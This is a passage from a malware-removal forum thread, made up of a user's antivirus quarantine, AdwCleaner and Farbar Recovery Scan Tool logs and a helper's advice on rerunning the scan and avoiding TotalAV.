    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS\CAST.CONFIG, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe.config, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\uninstaller.exe.config, Quarantined, [3707], [404709],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\NAMFRESH.BIN, Quarantined, [0], [392686],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I\CAST.CONFIG, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\config.conf, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe.config, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\GMJSB.exe.config, Quarantined, [3707], [404875],1.0.9182
    Adware.Linkury.TskLnk, C:\USERS\THOMAZING!\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444923],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\CONFIG.XML, Quarantined, [3745], [404859],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\JOYBAM.EXE, Quarantined, [0], [392686],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q\CAST.CONFIG, Quarantined, [3707], [404610],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\uninstaller.exe.config, Quarantined, [3707], [404610],1.0.9182
    Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\XUL9ZBX11.exe.config, Quarantined, [3707], [404610],1.0.9182
    Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444922],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\SILSONING.EXE, Quarantined, [0], [392686],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\hjuzju, Quarantined, [6000], [622124],1.0.9182
    Adware.Linkury, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\46C812328954B3C2.VIR\SET.EXE, Quarantined, [1174], [504848],1.0.9182
    Adware.ICLoader, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\423E52EEC1C7E6E2.VIR\LOCALNETSERVICE.EXE, Quarantined, [446], [629607],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6F63DA8166D7663.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\0B197384E1480C88.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\17B0D9AEADE97C1A.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\4D8D65C5DA32D3A5.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\5E15C71E020C778B.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\7349C58712B00B86.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\A7EC7F560E599347.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BC9E0698B166F917.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D41277DE13A9FABA.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\9869B8B38090EC66.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6D561D61D8312CF.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\002807D4DB6FEE2D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\2DCB9015FB18C84D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\638453067B9E1F8E.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\700D3EFE72E93B94.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\02FD59526C78F783.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\AEF671FBA34734D1.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\B3795D7D66BEAA7D.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\27C38BCBF4B005D9.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BCF319F66631ED11.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\8334C130D38839A4.VIR, Quarantined, [2891], [625750],1.0.9182
    Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\34A244487189F73A.VIR, Quarantined, [0], [392686],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BD9C0D84EEB01CAF.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\E89B8E7F8458E128.VIR, Quarantined, [2891], [625750],1.0.9182
    Adware.Agent, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Quarantined, [99], [431629],1.0.9182
    Adware.Linkury, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HBDZI2BL.PRE\APSF360DEV.EXE, Quarantined, [1174], [475745],1.0.9182
    Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\IS-A6C3B.TMP\HOUSSEMID.EXE, Quarantined, [2891], [636075],1.0.9182
    Backdoor.Andromeda, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\INSTALLER_MI.EXE, Quarantined, [837], [116111],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\NCYVGT4VXOC.EXE, Quarantined, [2805], [474076],1.0.9182
    Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\XTEX.EXE, Quarantined, [528], [636874],1.0.9182
    Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\PUVOQBDY.0AB\APP.EXE, Quarantined, [528], [636874],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [225], [550044],1.0.9182
    PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
    Adware.ICLoader, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\MCASIN.EXE, Quarantined, [446], [629607],1.0.9182
    Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\KSKYZLLQ.5IO\SETUP.EXE, Quarantined, [0], [392686],1.0.9182

    Physical Sector: 0
    (No malicious items detected)

    WMI: 0
    (No malicious items detected)


    (end)

  6. #6
    Join Date
    Jul 2008
    Posts
    232
    AdwCleaner[C00]

    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-02-07.2 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Clean
    # -------------------------------
    # Start: 02-09-2019
    # Duration: 00:00:01
    # OS: Windows 10 Pro
    # Cleaned: 17
    # Failed: 0


    ***** [ Services ] *****

    No malicious services cleaned.

    ***** [ Folders ] *****

    Deleted C:\Users\Thomazing!\AppData\Roaming\TotalAV
    Deleted C:\Users\Thomazing!\Documents\TotalAV
    Deleted C:\Windows\Syswow64\SSL
    Deleted C:\Users\Thomazing!\AppData\Local\WhiteClick
    Deleted C:\Windows\rss

    ***** [ Files ] *****

    Deleted C:\Windows\System32\drivers\WinmonFS.sys

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks cleaned.

    ***** [ Registry ] *****

    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
    Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
    Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
    Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
    Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
    Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
    Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
    Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries cleaned.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs cleaned.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries cleaned.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs cleaned.


    *************************

    [+] Delete Tracing Keys
    [+] Reset Winsock

    *************************

    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########









    AdwCleaner[S00]


    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-02-07.2 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Scan
    # -------------------------------
    # Start: 02-09-2019
    # Duration: 00:00:14
    # OS: Windows 10 Pro
    # Scanned: 31844
    # Detected: 17


    ***** [ Services ] *****

    No malicious services found.

    ***** [ Folders ] *****

    PUP.Optional.Legacy C:\Users\Thomazing!\AppData\Roaming\TotalAV
    PUP.Optional.Legacy C:\Users\Thomazing!\Documents\TotalAV
    PUP.Optional.Legacy C:\Windows\Syswow64\SSL
    PUP.Optional.WhiteClick C:\Users\Thomazing!\AppData\Local\WhiteClick
    Trojan.Agent C:\Windows\rss

    ***** [ Files ] *****

    Trojan.Agent C:\Windows\System32\drivers\WinmonFS.sys

    ***** [ DLL ] *****

    No malicious DLLs found.

    ***** [ WMI ] *****

    No malicious WMI found.

    ***** [ Shortcuts ] *****

    No malicious shortcuts found.

    ***** [ Tasks ] *****

    No malicious tasks found.

    ***** [ Registry ] *****

    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
    PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
    PUP.Optional.Glupteba HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
    PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
    PUP.Optional.PCProtect HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
    PUP.Optional.TotalAV HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
    PUP.Optional.TotalAV HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries found.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs found.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries found.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs found.



    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

  7. #7
    Join Date
    Jul 2008
    Posts
    232
    After doing AdwCleaner, there this trojan was blocked by malwarebytes. But it only pops once in a while. Trojan after AdwCleaner.png

  8. #8
    Join Date
    Jul 2008
    Posts
    232
    And why the scanners treat Total AV a PUP????

    Is that normal???

    heard that Total AV is the top 1 free antivirus for 2019...

  9. #9
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    I'd avoid that program. Please read here: https://malwaretips.com/threads/tota...-a-scam.80362/

    Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.


    • Double click to run it.
    • Make sure you checkmark Addition.txt box.
    • Press Scan button.
    • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

  10. #10
    Join Date
    Jul 2008
    Posts
    232
    Oh I see. What do you recommend aside from Avast? Somewhat has a very fast, simple and friendly interface? Is kaspersky good with that criteria?


    Here:


    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 8.02.2019
    Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (10-02-2019 15:24:18)
    Running from C:\Users\Thomazing!\Downloads
    Loaded Profiles: Thomazing! & (Available Profiles: Thomazing!)
    Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
    Default browser: IE
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
    HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    GroupPolicy: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{95ee421a-76b4-4efd-b402-599e79537eca}: [DhcpNameServer] 10.22.96.55 10.1.96.55

    Internet Explorer:
    ==================
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)

    FireFox:
    ========
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)

    Chrome:
    =======
    CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-10]
    CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
    CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
    CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
    CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
    CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
    CHR Extension: (No Name) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
    CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
